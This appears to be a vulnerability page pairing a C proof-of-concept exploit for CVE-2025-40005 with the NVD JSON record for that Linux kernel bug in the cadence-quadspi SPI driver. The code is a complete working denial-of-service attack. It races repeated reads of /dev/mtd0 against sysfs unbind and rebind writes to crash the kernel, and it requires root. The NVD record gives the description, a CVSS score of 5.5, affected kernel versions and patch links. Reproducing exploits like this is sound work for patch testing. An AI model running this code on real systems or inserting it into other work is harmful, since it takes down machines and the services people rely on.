CVE-2025-40005

// CVE-2025-40005 PoC - Trigger kernel crash via race condition // between SPI indirect read/write and driver unbind #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <fcntl.h> #include <string.h> #include <pthread.h> #include <sys/ioctl.h> #include <errno.h> // SPI device path for cadence-quadspi controller #define QSPI_DEVICE "/dev/mtd0" // MTD device backed by QSPI NOR flash #define QSPI_DRIVER_PATH "/sys/bus/platform/drivers/cdns-qspi" #define QSPI_DEVICE_BIND "1f040000.spi" // Thread function to continuously read from QSPI device void *read_thread(void *arg) { int fd; char buf[4096]; while (1) { fd = open(QSPI_DEVICE, O_RDONLY); if (fd >= 0) { // Perform continuous reads to trigger indirect read operations lseek(fd, 0, SEEK_SET); read(fd, buf, sizeof(buf)); close(fd); } usleep(100); // Small delay to increase race window } return NULL; } // Thread function to unbind the QSPI driver void *unbind_thread(void *arg) { int fd; char path[256]; snprintf(path, sizeof(path), "%s/unbind", QSPI_DRIVER_PATH); while (1) { fd = open(path, O_WRONLY); if (fd >= 0) { write(fd, QSPI_DEVICE_BIND, strlen(QSPI_DEVICE_BIND)); close(fd); } // Rebind for next iteration usleep(1000); snprintf(path, sizeof(path), "%s/bind", QSPI_DRIVER_PATH); fd = open(path, O_WRONLY); if (fd >= 0) { write(fd, QSPI_DEVICE_BIND, strlen(QSPI_DEVICE_BIND)); close(fd); } usleep(1000); } return NULL; } int main(int argc, char *argv[]) { pthread_t t1, t2; printf("CVE-2025-40005 PoC - requires root privileges\n"); if (geteuid() != 0) { fprintf(stderr, "Error: This PoC requires root privileges\n"); return 1; } // Create threads to trigger race condition pthread_create(&t1, NULL, read_thread, NULL); pthread_create(&t2, NULL, unbind_thread, NULL); // Wait for kernel crash pthread_join(t1, NULL); pthread_join(t2, NULL); return 0; }

{"cve": {"id": "CVE-2025-40005", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-20T16:15:37.127", "lastModified": "2026-03-25T11:16:12.737", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nspi: cadence-quadspi: Implement refcount to handle unbind during busy\n\ndriver support indirect read and indirect write operation with\nassumption no force device removal(unbind) operation. However\nforce device removal(removal) is still available to root superuser.\n\nUnbinding driver during operation causes kernel crash. This changes\nensure driver able to handle such operation for indirect read and\nindirect write by implementing refcount to track attached devices\nto the controller and gracefully wait and until attached devices\nremove operation completed before proceed with removal operation."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.9", "versionEndExcluding": "6.6.125", "matchCriteriaId": "A2F78819-3B3D-45F2-B2BC-445385A4FAE4"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.7", "versionEndExcluding": "6.16.10", "matchCriteriaId": "898CB0E7-69BE-48EB-A212-89F26E47CC47"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.17:rc1:*:*:*:*:*:*", "matchCriteriaId": "327D22EF-390B-454C-BD31-2ED23C998A1C"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.17:rc2:*:*:*:*:*:*", "matchCriteriaId": "C730CD9A-D969-4A8E-9522-162AAF7C0EE9"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.17:rc3:*:*:*:*:*:*", "matchCriteriaId": "39982C4B-716E-4B2F-8196-FA301F47807D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.17:rc4:*:*:*:*:*:*", "matchCriteriaId": "340BEEA9-D70D-4290-B502-FBB1032353B1"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/56787f4a75907ae99b5f5842b756fa68e2482f6d", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/65ed52200080eafce3eead05cf22ce01238defca", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/7446284023e8ef694fb392348185349c773eefb3", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/8df235f768cea7a5829cb02525622646eb0df5f5", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/b7ec8a2b094a33d0464958c2cbf75b8f229098b0", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}